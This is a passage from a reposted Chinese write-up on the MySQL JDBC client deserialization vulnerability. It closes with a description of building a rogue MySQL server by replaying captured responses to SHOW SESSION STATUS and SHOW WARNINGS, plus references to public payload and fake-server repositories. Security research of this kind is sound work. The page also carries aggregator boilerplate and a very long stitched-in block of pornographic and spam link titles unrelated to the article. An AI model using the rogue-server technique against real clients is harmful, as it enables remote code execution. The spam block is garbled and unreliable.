????/*?mysql-connector-java-8.0.14?(Revision:?36534fa273b4d7824a8668ca685465cf8eaeadd9)?*/SELECT?...
????然后按抓包所示響應隨后而來的"SHOW?WARNINGS"。
????特殊響應"SHOW?SESSION?STATUS",然后必須特殊響應隨后而來的
????"SHOW?WARNINGS"。

這種搞法的好處是不用特別理解MySQL私有協議,fnmsd"踩過的坑"你都不會碰上。

十多年前我們按協議規范組織SMB報文時,有天看到某人在PoC里用了一個變量名,叫sendcode,他實際是把Ethereal抓包看到數據直接投放出來。當時我們很震驚,不是佩服得震驚。后來覺得某些場景下這樣干,也沒什么可鄙視的。

基于三次抓包組織響應報文的思路,跟sendcode異曲同工,比你想像得要通用。

當然,如果不是特別好奇,還是用fnmsd的實現吧。

☆ 參考資源

[1]?New?Exploit?Technique?In?Java?Deserialization?Attack?-?Yang?Zhang?[2019-11-26]
????https://i.blackhat.com/eu-19/Thursday/eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack.pdf

[2]?JDBC導致的反序列化攻擊?-?Welkin?[2019-12-17]
????https://www.cnblogs.com/Welk1n/p/12056097.html

[3]?https://github.com/codeplutos/MySQL-JDBC-Deserialization-Payload

[4]?MySQL?JDBC客戶端反序列化漏洞分析?-?fnmsd?[2020-04-15]
????https://www.anquanke.com/post/id/203086
????https://blog.csdn.net/fnmsd/article/details/106232092

????https://github.com/fnmsd/MySQL_Fake_Server

[5]?6.2?Connection?URL?Syntax
????https://dev.mysql.com/doc/connector-j/8.0/en/connector-j-reference-jdbc-url-format.html

????6.3?Configuration?Properties
????https://dev.mysql.com/doc/connector-j/8.0/en/connector-j-reference-configuration-properties.html

????13.7.5.25?SHOW?PLUGINS?Statement
????https://dev.mysql.com/doc/refman/5.7/en/show-plugins.html

????24.10?The?INFORMATION_SCHEMA?GLOBAL_STATUS?and?SESSION_STATUS?Tables
????https://dev.mysql.com/doc/refman/5.7/en/status-table.html

????14.6.4.1?COM_QUERY?Response
????https://dev.mysql.com/doc/internals/en/com-query-response.html

????14.7.3?Binary?Protocol?Value
????https://dev.mysql.com/doc/internals/en/binary-protocol-value.html

????14.12.2?ProtocolText::Resultset
????https://dev.mysql.com/doc/internals/en/protocoltext-resultset.html

本篇TXT原文:
http://scz.617.cn/network/202005262206.txt

總結

以上是生活随笔為你收集整理的dual mysql 获取序列_MySQL JDBC客户端反序列化漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

国产在线观看免费av | 日韩欧美视频在线观看免费 | 日本在线观看视频一区 | 久久国产二区 | 亚洲日本va中文字幕 | 久草在线视频网站 | 91精品导航| 精品视频亚洲 | 青春草免费在线视频 | 美女在线免费观看视频 | a'aaa级片在线观看 | 波多野结衣亚洲一区二区 | 亚洲一区日韩 | 高清不卡一区二区三区 | www黄色软件 | 91精品国产欧美一区二区 | 欧美日韩在线观看不卡 | 久久精品视频在线免费观看 | 国产在线a不卡 | 97热视频| 免费看国产精品 | 成人毛片a | 国产一级特黄电影 | 国产伦理一区二区 | 亚洲视频在线免费观看 | 国内精品免费 | 欧美一级片在线免费观看 | 天天伊人狠狠 | 亚洲国产成人av网 | 国产成人免费观看 | 欧美日韩三级在线观看 | 伊人色综合久久天天网 | 国产原创av片| 婷婷精品在线 | 国产精品一区二区吃奶在线观看 | 91av久久| 91九色视频国产 | 久久久久久国产精品久久 | 最新免费av在线 | 国产精品不卡视频 | 伊人成人激情 | 麻豆国产精品一区二区三区 | 国产精品一区二区在线免费观看 | 亚洲一区久久久 | 美女免费视频一区 | 精品久久久久久久久久久院品网 | 国产免费观看av | 五月婷婷av | 美女黄网久久 | 久久久96 | 天天干,天天射,天天操,天天摸 | 人人插人人澡 | 天堂av网站| 麻豆久久| 美女视频黄频大全免费 | 天天草天天操 | 久久久香蕉视频 | 久草在线这里只有精品 | 国产精品视频久久久 | 欧美人交a欧美精品 | 国产精品免费视频网站 | 五月天婷婷狠狠 | 成人影视片 | 99爱在线| 黄色官网在线观看 | 久久9999久久免费精品国产 | av黄色影院 | 国产伦理一区二区三区 | 亚洲黄色片一级 | 7777精品伊人久久久大香线蕉 | 久久99国产综合精品 | 欧美日韩亚洲国产一区 | 久久99久久99精品中文字幕 | 久久精品国产亚洲aⅴ | 中文字幕乱码电影 | 国产在线无 | 色综合久久久久久中文网 | 国产精品永久免费 | 久久99国产视频 | 免费又黄又爽视频 | 国产免费久久av | 日韩精品一区二区三区在线视频 | zzijzzij亚洲成熟少妇 | 免费网址在线播放 | 亚洲视频在线免费观看 | 麻豆视频免费在线播放 | 欧美最猛性xxxxx(亚洲精品) | 日日干夜夜干 | 色综合天天综合网国产成人网 | 日韩av电影中文字幕在线观看 | 国产精品福利一区 | 99在线精品视频 | 激情在线网址 | 久久久久久国产精品 | 99色网站 | 久热超碰 | 精品久久久久久亚洲综合网站 | 久久av网 | 国产亚洲精品久久久久久久久久 | 午夜av片| 久久电影色 | 中文字幕av免费在线观看 | 国产精品原创在线 | 97超碰在线人人 | 久久久久日本精品一区二区三区 | 中文字幕网址 | 一 级 黄 色 片免费看的 | 欧美精品被 | 在线视频日韩精品 | 中文网丁香综合网 | 91cn国产在线 | 久久久蜜桃 | 亚洲视频1 | 欧美成人精品在线 | 日韩在线免费高清视频 | 夜夜夜夜猛噜噜噜噜噜初音未来 | 色窝资源 | 国产又粗又硬又长又爽的视频 | 亚洲欧洲精品久久 | 久久久免费观看视频 | 成人97人人超碰人人99 | 色偷偷88888欧美精品久久 | www.国产精品| 国产极品尤物在线 | 国产精品大尺度 | 91福利免费 | 激情开心色 | 久久久精品福利视频 | 狠狠的干狠狠的操 | 久久人人爽人人 | 中文字幕a∨在线乱码免费看 | 国产中文字幕免费 | 亚洲欧美日韩国产精品一区午夜 | 成年人免费看片网站 | 国产精品人人做人人爽人人添 | 亚洲天堂在线观看完整版 | 91av九色| 免费看黄色91 | 成片免费观看视频大全 | 午夜视频免费播放 | 亚洲区视频在线观看 | 国产永久免费高清在线观看视频 | 九九热只有精品 | 免费亚洲一区二区 | 婷婷香蕉 | 亚洲一级片在线看 | 韩国精品视频在线观看 | 国产亚洲精品久久久久久无几年桃 | 国产精品成人av电影 | 在线三级av| 少妇av片 | 国产成人一区二区三区久久精品 | 1000部国产精品成人观看 | 九九三级毛片 | 在线观看免费av网 | 香蕉久久国产 | 久久国产乱 | 91亚洲欧美激情 | 国产在线视频一区二区三区 | 97在线观看| 伊人五月婷 | 天天综合天天做天天综合 | 西西444www高清大胆 | 干 操 插| 久久国产精品一二三区 | 日韩性xxxx | 久久久久女教师免费一区 | 欧美激情精品久久久久久免费印度 | 久久久久亚洲天堂 | 66av99精品福利视频在线 | 欧美在线观看视频 | 日日夜夜天天人人 | 成年人天堂com | 91成人精品一区在线播放69 | 久久视频中文字幕 | 久久综合久久综合久久综合 | 99999精品| 国产精品99久久久久的智能播放 | 九九在线高清精品视频 | 国产精品自在线拍国产 | 99免费在线观看视频 | 国产精品一区在线播放 | 日韩网 | 成人在线视频免费看 | 成人午夜在线观看 | 狠狠婷婷 | 日韩理论在线视频 | 91亚洲精品久久久中文字幕 | 国产精品乱码一区二三区 | 国产日韩欧美在线影视 | 中文字幕电影高清在线观看 | 黄色片视频在线观看 | 99亚洲视频 | 国产精品视频区 | 色丁香婷婷 | 久久在线免费 | av色影院 | 欧美人人爱 | 美女网站在线 | 2024av | 亚洲综合丁香 | 亚洲免费一级电影 | 国产成人精品不卡 | 国产亚洲视频中文字幕视频 | 国内99视频 | 欧美激情在线看 | 波多野结衣在线观看视频 | 欧美一区二区三区在线看 | 天天插天天操天天干 | 91亚洲精品国偷拍自产在线观看 | 亚洲区另类春色综合小说校园片 | 欧美日韩精品在线观看 | 三级视频片 | 欧美日韩亚洲国产一区 | 中文字幕高清av | 中文字幕永久在线 | 久久爱992xxoo| 天天插天天 | 国产日韩欧美在线一区 | 精品黄色片 | 国产超碰97 | 黄在线免费看 | 综合激情| 国产精品一区二区av | 国产无区一区二区三麻豆 | 91在线免费视频观看 | 日本女人逼 | 亚洲一区二区三区四区精品 | 精品一区二区在线观看 | 婷婷综合视频 | 色片网站在线观看 | 一区二区国产精品 | 在线电影 你懂得 | 狠狠狠色丁香综合久久天下网 | 久久美女精品 | 在线观看你懂的网站 | 国产一级精品在线观看 | 在线观看av国产 | 爱情影院aqdy鲁丝片二区 | 奇米影视777四色米奇影院 | 丁香花在线观看免费完整版视频 | 九九热精| 色婷婷狠狠五月综合天色拍 | 日韩av电影网站在线观看 | 手机在线欧美 | 国产精品麻豆99久久久久久 | 久久免费国产精品 | 日韩r级在线 | 国产a免费 | 色播激情五月 | 免费观看午夜视频 | av黄色在线观看 | av在线进入 | 久久久综合色 | 精品久久久精品 | 久久久亚洲国产精品麻豆综合天堂 | 九九热视频在线播放 | 偷拍区另类综合在线 | 国产资源免费在线观看 | 国产高清在线免费视频 | www.国产在线视频 | 成人免费在线网 | 日韩av二区 | 久久久久免费精品 | 中文字幕av免费在线观看 | 国产精品福利一区 | 欧美日韩精品在线播放 | 久久久www成人免费精品 | 在线免费试看 | 亚洲免费一级 | 国产精品午夜久久久久久99热 | 亚洲天堂网在线播放 | 成人在线视频论坛 | 久久成人国产精品一区二区 | 亚洲欧美日韩一二三区 | 亚洲国产丝袜在线观看 | 久久精品电影网 | 国产精品免费视频久久久 | 欧美片网站yy | 免费看一级片 | 一区二区视频在线观看免费 | 久久综合五月天婷婷伊人 | 成人黄色电影免费观看 | 丝袜一区在线 | 正在播放一区 | 婷婷草 | 久久成人精品视频 | 日本精品一二区 | 国产视频一区二区在线观看 | 成人黄色中文字幕 | av观看网站| 黄a在线观看 | 天天操天天干天天综合网 | 欧美日韩高清一区 | 91精品在线免费 | 免费国产在线观看 | 一区二区视频网站 | 一区在线播放 | 国产一区在线视频观看 | 国产精品一区二区av影院萌芽 | 在线亚洲小视频 | 人人爽人人 | 免费av成人在线 | 91麻豆福利 | 日韩专区在线观看 | 天天搞夜夜骑 | 亚洲成人午夜av | 能在线观看的日韩av | 久草在线久 | 欧美性黑人 | 免费看黄色毛片 | 91热精品| 日韩a免费| 成人午夜电影在线观看 | 国产精品高清免费在线观看 | 国内精品久久久久久久久久 | 91在线视频免费 | 国产亚洲精品久久久久久久久久久久 | 日韩激情在线视频 | 九九免费在线观看 | 天天干天天操天天 | 丁香婷婷激情啪啪 | 日韩欧美视频 | 日本女人的性生活视频 | 国产精品第72页 | 国产成人免费精品 | 久久综合视频网 | 在线视频区| 国产在线观看av | 午夜18视频在线观看 | 中文字幕乱视频 | 五月婷婷一区二区三区 | 亚洲精品乱码久久久久久蜜桃91 | 波多野结衣一区 | 日韩一区二区三免费高清在线观看 | 亚洲天天在线日亚洲洲精 | 97国产在线 | av在线超碰| 久久久人人人 | 91视频在线免费 | 91桃色在线免费观看 | 干天天 | 99在线国产 | 久久综合九色综合欧美狠狠 | 91在线网站| 黄色资源在线观看 | 久久久午夜电影 | 国产精品久久久久久久妇 | 天天操 夜夜操 | 特级黄色片免费看 | 国产成人亚洲在线观看 | 精品免费国产一区二区三区四区 | 99色在线播放 | 欧美天天综合网 | 久久涩涩网站 | 五月激情av | 中文超碰字幕 | 中文字幕在线播放日韩 | 久草在线免费色站 | 手机av观看 | 久久网页 | 黄色软件大全网站 | 偷拍视频一区 | 99精品视频99 | 久久久久久久久电影 | 色99导航 | 日韩精品资源 | 久久精品中文字幕 | 国产特级毛片aaaaaa高清 | 欧美一级特黄高清视频 | 久久天天躁夜夜躁狠狠躁2022 | 久久精品男人的天堂 | 亚洲久草网 | 久久久99精品免费观看 | 91在线中文| 成年美女黄网站色大片免费看 | 人人狠狠综合久久亚洲婷 | 91精品久久久久久久久久入口 | 欧美一级专区免费大片 | 永久免费的av电影 | 亚洲视频,欧洲视频 | 国产大陆亚洲精品国产 | 国产伦精品一区二区三区照片91 | 国产精品激情在线观看 | 一级特黄aaa大片在线观看 | 亚洲视频在线观看免费 | 97在线免费观看视频 | 国产在线观看污片 | 精品一区二区三区四区在线 | 五月婷婷婷婷婷 | 99精品视频播放 | 日韩欧美视频一区二区三区 | 欧美日韩国产精品一区二区 | 久久久精品一区二区三区 | 91麻豆网站 | 天堂av在线 | 欧美国产日韩中文 | 国产美女精品视频 | av色网站| 亚洲国产mv | 国产精品乱码高清在线看 | 黄色福利网站 | 国产精品久久电影观看 | 国产一区视频在线观看免费 | 日韩av电影手机在线观看 | av一区二区在线观看中文字幕 | 亚洲最新视频在线 | 亚州精品天堂中文字幕 | 婷婷久久一区二区三区 | 天天射天天爽 | 国产高清亚洲 | 亚洲一级黄色 | 九九在线高清精品视频 | 成人免费视频网 | 色a资源在线 | 欧美精品v国产精品v日韩精品 | 亚洲另类人人澡 | 国产精品一区二区中文字幕 | 日韩精品一区二区三区中文字幕 | www.com黄| 亚洲免费一级电影 | 精品无人国产偷自产在线 | www.神马久久 | 国产亚洲91 | 国内精品久久久久久久久久久久 | 日韩精品第1页 | 日韩电影在线视频 | 亚洲片在线资源 | 综合色婷婷 | 狠狠干网 | 精品在线一区二区三区 | 欧美aaaxxxx做受视频 | 国产精品99久久免费黑人 | 午夜精品麻豆 | 国产一区二区精品91 | 永久免费的啪啪网站免费观看浪潮 | 日韩高清免费在线观看 | 91久久精| 中文字幕一区二 | 免费在线观看一级片 | 97精品久久| 色视频在线 | 亚洲砖区区免费 | 国产97色 | 免费一级片在线 | 中文永久字幕 | 久草在线免费电影 | 91在线看片 | 国产精品免费久久 | 久久久久久久久久国产精品 | 日韩城人在线 | 欧美亚洲一区二区在线 | 在线观看国产www | 欧美日韩高清一区二区 | 久久久久久蜜av免费网站 | 天天色天天操综合网 | av爱干| 久久黄色片 | www.狠狠插.com| 日本xxxx.com| 国产亚洲精品久 | 亚洲电影av在线 | 国产专区精品 | 国产精品视频线看 | 人成免费网站 | 激情欧美日韩一区二区 | 国产小视频精品 | 国产精品九九久久99视频 | 青草视频免费观看 | 探花视频在线观看 | 在线网址你懂得 | 久久久久久久久久久高潮一区二区 | 欧美一级性生活片 | 日韩欧美视频在线播放 | 亚洲精品女人久久久 | 国产黄影院色大全免费 | 九九免费精品视频在线观看 | 日韩欧美xxx | 亚洲精品66 | 国产精品免费观看视频 | 久久不射网站 | 国产在线精品播放 | 97碰碰精品嫩模在线播放 | 成人免费网站在线观看 | av看片网址| 日韩在线短视频 | 国产v在线| 国产一区二区在线观看免费 | 成人黄色电影免费观看 | 国产精品精品久久久 | 六月婷色 | 日韩久久一区 | 中文字幕亚洲欧美日韩 | 久久99久久精品 | 韩国av三级| 五月婷婷国产 | 二区在线播放 | 欧美精品少妇xxxxx喷水 | 日日摸日日碰 | 黄色亚洲片 | 久久综合五月天 | 在线观看精品视频 | 在线免费av网 | 精品国产一区二区三区四 | 久久久久久久久久伊人 | 亚洲丁香日韩 | 精品国产乱子伦一区二区 | 欧美成人日韩 | 五月婷婷丁香激情 | av大片网址 | 亚洲国产一区在线观看 | www.888av | 婷婷综合导航 | 99久久精品国产系列 | 婷婷新五月 | 久久成人精品电影 | 深夜免费小视频 | 亚洲精品一区二区三区在线观看 | 国产久草在线观看 | 久久五月婷婷丁香 | 国产精品久久久久久超碰 | 国产精品久久久久久久久久尿 | 日本爽妇网 | 久久精彩视频 | 日韩在线免费小视频 | 黄色av免费电影 | 国产又粗又硬又长又爽的视频 | 中文字幕成人在线观看 | 91热精品 | av在线影视 | 日韩视频中文字幕 | 黄a在线| 992tv在线 | 99久久精品无免国产免费 | 亚洲二区精品 | 久久一区国产 | 久久网站最新地址 | 久久国产三级 | 永久免费毛片在线观看 | 日韩久久精品一区二区三区下载 | 在线观看你懂的网站 | 日韩簧片在线观看 | 91在线最新| 在线视频久 | 深爱激情开心 | 精品嫩模福利一区二区蜜臀 | 天堂激情网 | av天天干| 午夜电影中文字幕 | 超碰人人舔 | 精品一区二区在线看 | 久久久久久久久艹 | www激情网| 激情五月婷婷激情 | 日韩丝袜在线观看 | 精品色综合 | 99久久精品国产欧美主题曲 | 黄色网在线免费观看 | 98超碰人人 | 久久久久久网址 | 一区二区欧美在线观看 | 麻花传媒mv免费观看 | japanese黑人亚洲人4k | 免费a网址 | 最近中文字幕免费av | 国产精品va最新国产精品视频 | 在线看成人av | 91人人爽久久涩噜噜噜 | 91视频88av| 国产永久免费观看 | 久久久黄色免费网站 | 91亚洲精品久久久久图片蜜桃 | 狠狠狠色丁香婷婷综合久久五月 | 久久男人中文字幕资源站 | 色婷婷丁香 | 1区2区3区在线观看 三级动图 | 国产又黄又爽无遮挡 | 国产一区二区三区免费观看视频 | 成人av免费播放 | 国产一区二区视频在线 | 日韩欧美视频一区二区 | 精品久久在线 | 国产精品久久久久久久久大全 | 黄色av网站在线观看免费 | 黄色免费国产 | 日本性动态图 | 一区二区 久久 | 久久夜色精品国产亚洲aⅴ 91chinesexxx | 三级视频片 | 欧美性护士 | 日韩一二三在线 | 美女网站色 | 高清久久久久久 | 91成人精品在线 | 久操久 | 在线视频 91| 欧美久久99 | 亚洲精品国偷自产在线99热 | 亚洲作爱视频 | 久久久久久国产精品美女 | 亚州av免费 | 欧美日韩视频免费看 | 成人午夜剧场在线观看 | 成人91免费视频 | 欧美亚洲精品一区 | 成人av影视 | 日本一区二区不卡高清 | 久久久久久久久久久久久久电影 | 99久久99久久精品免费 | 日韩在线中文字幕视频 | 狠狠伊人| 国产精品成人一区二区 | 丰满少妇一级片 | 97在线免费观看视频 | 亚洲国产网站 | 日韩精品一区在线播放 | 久久美女免费视频 | 国产色女人 | 国产在线国偷精品产拍免费yy | 免费电影一区二区三区 | 婷婷色中文网 | 最近中文字幕免费 | 亚州精品天堂中文字幕 | 黄色网址在线播放 | 日本久久精品视频 | 国产91区| 精品久久久网 | 五月婷婷在线综合 | 久亚洲 | 色多多视频在线观看 | 久久九九精品久久 | 日韩欧美综合在线视频 | 中文字幕免费在线看 | 亚洲精品高清视频在线观看 | 日韩欧美视频免费在线观看 | 亚洲欧美经典 | 免费国产黄线在线观看视频 | 国产精品1区2区3区 久久免费视频7 | 91精品在线免费观看视频 | 色综合天天在线 | 日本 在线 视频 中文 有码 | 99情趣网视频 | 欧美日韩国产免费视频 | 高清国产午夜精品久久久久久 | 亚洲区另类春色综合小说校园片 | 久久免费福利视频 | 亚洲综合色播 | 久久伊人精品一区二区三区 | av性在线| 波多野结衣理论片 | 久草在线欧美 | 在线观看成人av | 午夜在线日韩 | 久久人人爽人人片av | 亚洲人成综合 | 久草在线一免费新视频 | 精品成人在线 | 日韩黄色中文字幕 | 在线看片日韩 | 国产一二三区在线观看 | 欧美大码xxxx| 人人澡人人舔 | 天天操天天吃 | 波多野结衣在线中文字幕 | 人人躁 | 国产亚洲欧洲 | 欧美日韩免费一区二区三区 | 看国产黄色片 | 精品国产一区二区三区久久久 | 欧美极品在线播放 | 在线观看亚洲成人 | 中文字幕中文字幕 | 亚洲精品综合一区二区 | 成人黄色电影免费观看 | 久久男人中文字幕资源站 | 麻豆视频入口 | 97超碰色| 玖草在线观看 | 国产裸体视频bbbbb | 中文字幕亚洲不卡 | 超碰免费在线公开 | 国产精品欧美 | 国产乱码精品一区二区蜜臀 | 久久蜜臀一区二区三区av | 国产精品乱码久久久久久1区2区 | 亚洲国产午夜精品 | 国产精品小视频网站 | 精品免费在线视频 | 国产午夜麻豆影院在线观看 | 69久久久久久久 | 一区二精品| 中文字幕乱在线伦视频中文字幕乱码在线 | www.黄色片.com | 91香蕉国产 | 亚洲国产精品va在线看黑人 | 久久你懂的 | 韩日电影在线观看 | 射综合网| 日韩在线免费观看视频 | 91成年人网站 | 免费电影播放 | 国产大片免费久久 | 九九综合九九 | 欧美在线a视频 | 午夜在线免费观看 | 亚洲欧美精品一区二区 | 狠狠操夜夜操 | 激情视频免费观看 | 国产美女黄网站免费 | 亚洲精品视频免费 | 精品国产伦一区二区三区 | 中文字幕免费在线看 | av免费看电影 | 激情视频区 | 免费高清国产 | www.com在线观看 | 国产99在线播放 | 成人免费在线播放 | 国产精品理论片在线播放 | 日本中出在线观看 | 免费在线观看a v | 久久99精品国产一区二区三区 | 亚洲春色综合另类校园电影 | 韩日在线一区 | 国产成人一区二区三区影院在线 | 国产糖心vlog在线观看 | 97超碰人人 | 自拍超碰在线 | 久久久久免费网 | 亚洲日韩中文字幕在线播放 | 欧美大片在线观看一区 | 一级黄色片在线免费看 | 在线观看国产一区 | 91女人18片女毛片60分钟 | 亚洲精品国产高清 | 久久久精品小视频 | 国产91在| 2023亚洲精品国偷拍自产在线 | www黄色av| 国产精品国内免费一区二区三区 | 色国产精品一区在线观看 | 欧美精品一区在线 | 亚洲精品国产综合久久 | 久久精品在线 | 亚洲精品国 | 亚洲天天在线 | 天天射天天操天天干 | 亚洲japanese制服美女 | 高清不卡一区二区在线 | 国产精品99久久99久久久二8 | 国产精品99免费看 | 在线成人免费av | 国产精品麻豆视频 | 国产精品自在欧美一区 | 国产高清黄| 欧美日韩国产三级 | 国产福利一区二区在线 | 亚洲一区不卡视频 | 欧美成人69av | 久久久国产毛片 | 久久99精品一区二区三区三区 | 免费在线一区二区 | 成人黄色免费在线观看 | 亚洲h在线播放在线观看h | 久久爽久久爽久久av东京爽 | 国产美女在线免费观看 | 激情深爱五月 | 久久久久亚洲国产精品 | 久久久久www | 日本不卡一区二区 | 黄色1级毛片 | av在线超碰 | 黄色大片免费网站 | 国产精品一区二区久久精品爱微奶 | 国产精品手机在线 | 国产黄色片在线 | 91九色视频在线播放 | 成人久久18免费 | 91亚·色 | 丁香六月中文字幕 | 亚洲成年人在线播放 | 成年人免费在线观看网站 | 在线看欧美 | 免费视频三区 | 中文字幕免费高清av | 午夜精品一区二区三区可下载 | 在线综合 亚洲 欧美在线视频 | 手机看片福利 | 偷拍视频一区 | 成人欧美亚洲 | 偷拍精偷拍精品欧洲亚洲网站 | 亚洲一二三久久 | 97精品国产97久久久久久免费 | 韩日精品中文字幕 | 在线免费观看国产视频 | 色爱成人网 | 精品久久久久久久久久国产 | 国产精品 日韩 欧美 | 69av在线播放 | 婷婷在线综合 | 国产精品久久久久av福利动漫 | 最近字幕在线观看第一季 | 97视频免费观看 | 成人av在线电影 | 欧美做受高潮电影o | 亚洲91视频| 久久久久久久电影 | 日韩电影中文 | 亚洲高清资源 | 天堂网av在线 | 在线欧美最极品的av | 国产成人久久精品77777综合 | 97国产精品亚洲精品 | 免费日韩 精品中文字幕视频在线 | 粉嫩av一区二区三区四区在线观看 | 久久艹艹 | 国产精品二区三区 | 四虎国产 | 亚洲午夜在线视频 | 国内视频 | 久日精品 | 探花系列在线 | 久草视频网 | 欧美亚洲三级 | 婷婷综合五月天 | 国产成人在线综合 | 在线一二区 | 久久久久电影 | 激情综合六月 | 天天操天天爱天天干 | 亚洲成人精品av | 精品国产综合区久久久久久 | 久射网| 四虎成人免费影院 | 亚洲第二色 | 成人免费影院 | 又黄又刺激 | 国产成人av综合色 | 国产视频一 | 国产中文字幕视频在线 | 亚洲天堂精品 | 韩国精品福利一区二区三区 | 国产美腿白丝袜足在线av | 在线免费91 | 欧美资源在线观看 | 日韩免费一区二区三区 | 亚洲精品国偷拍自产在线观看 | 久久久久久久看片 | 香蕉在线视频观看 | 国产精品自拍在线 | 久久av免费电影 | 97超碰人人澡人人爱学生 | 久久在线视频在线 | 在线色吧 | 99热在线国产 | 免费福利在线观看 | 亚洲成人国产精品 | 国产精品二区在线观看 | 亚洲jizzjizz日本少妇 | 免费一级片久久 | 麻豆av电影 | 可以免费观看的av片 | 久久激情综合网 | 在线观看视频h | 91精品成人 | 韩日在线一区 | 国产第一福利 | 亚洲无人区小视频 | 亚洲免费av在线播放 | 综合久久久久久久久 | 在线你懂 | 国产第一福利网 | 成人av电影免费 | 精品一区在线 | 久草在线费播放视频 | 中文字幕无吗 | 韩国av不卡 | 伊人婷婷 | av日韩不卡 | 四虎国产精品免费观看视频优播 | 在线亚洲欧美日韩 | 久久不卡av | 好看的国产精品视频 | 97免费视频在线 | 免费观看的av | 91久久国产综合精品女同国语 | 91中文在线视频 | 九九在线视频免费观看 | 国产专区精品 | 欧美精品免费在线观看 | 天天爽夜夜爽人人爽一区二区 | 色视频网站免费观看 | 国产精品一区免费看8c0m | 香蕉97视频观看在线观看 | 亚洲精品国产精品乱码在线观看 | 天堂中文在线播放 | 国产成人99久久亚洲综合精品 | 贫乳av女优大全 | 日韩欧美一区二区在线观看 | 中文字幕免费成人 | 开心丁香婷婷深爱五月 | 99精品视频网 | 久久午夜电影网 | 一级大片在线观看 | 免费网站观看www在线观看 | 最新av网站在线观看 | 国产视频在线观看一区 | 免费在线h| 久久免费国产精品 | 视频一区视频二区在线观看 | 国内精品亚洲 | 黄色小说免费观看 | 成年人毛片在线观看 | 久草视频国产 | 久久久久久久久久久久国产精品 | 日韩一二三在线 | 精品影院一区二区久久久 | 国内精品福利视频 | 玖玖视频国产 | 国产色影院| 久久久久久久久久久福利 | 激情影音先锋 | 久久久久国产精品厨房 | 久久综合久久综合久久 | 国产精品成人免费一区久久羞羞 | 一区精品久久 | 欧美一二三四在线 | 国产精品欧美久久久久三级 | 欧美日韩国产精品一区二区 | 91精品人成在线观看 | 亚洲va欧美va人人爽 | www.狠狠 | 久久久久久国产精品亚洲78 | 伊人天天狠天天添日日拍 | 国内外成人在线 | 日韩高清 一区 | 欧美精品中文字幕亚洲专区 | 国产91精品一区二区绿帽 | 五月天色婷婷丁香 | 欧美日韩精品在线视频 | 免费人成网ww44kk44 | 免费在线观看国产精品 | 狠狠激情中文字幕 | www.久久免费视频 | 色婷婷激情五月 | 在线视频 亚洲 | www.黄色片网站 | 国产高清在线观看av | 色多视频在线观看 | 色婷婷国产 | 黄色.com| av.com在线| 国产91电影在线观看 | 久久天堂亚洲 | 一本一本久久aa综合精品 | 99国产精品久久久久久久久久 | www亚洲国产| 国产麻豆剧传媒免费观看 | 中文字幕一二三区 | avlulu久久精品 | 激情五月色播五月 | 久久超碰97 | 在线免费色视频 | a在线免费观看视频 | 久久久性 | 中文字幕丝袜美腿 | 国产精品 国产精品 | 色香网 | 91人人人| 99视频精品视频高清免费 | 亚洲午夜精品久久久久久久久久久久 | 久久久亚洲国产精品麻豆综合天堂 | 成人免费 在线播放 | 久久99久久99久久 | 五月亚洲 | 欧美性黑人 | 黄污视频网站 | 毛片网站观看 | 久久久久一区 | 丁香视频在线观看 | 综合精品久久久 | 国产视频在线观看一区 | 天天要夜夜操 | 国产精品久久三 | 97视频人人澡人人爽 | 国产69精品久久99不卡的观看体验 | 天天射天天色天天干 | 天天曰天天 | 国产黄色片免费在线观看 | 亚洲乱码精品久久久久 | 成人午夜片av在线看 | 激情欧美在线观看 | 亚洲精品乱码久久久久久蜜桃动漫 | 国产精品久久99 | 久久久久国产a免费观看rela | 婷婷在线免费视频 | 999视频网 | 久久久久综合精品福利啪啪 |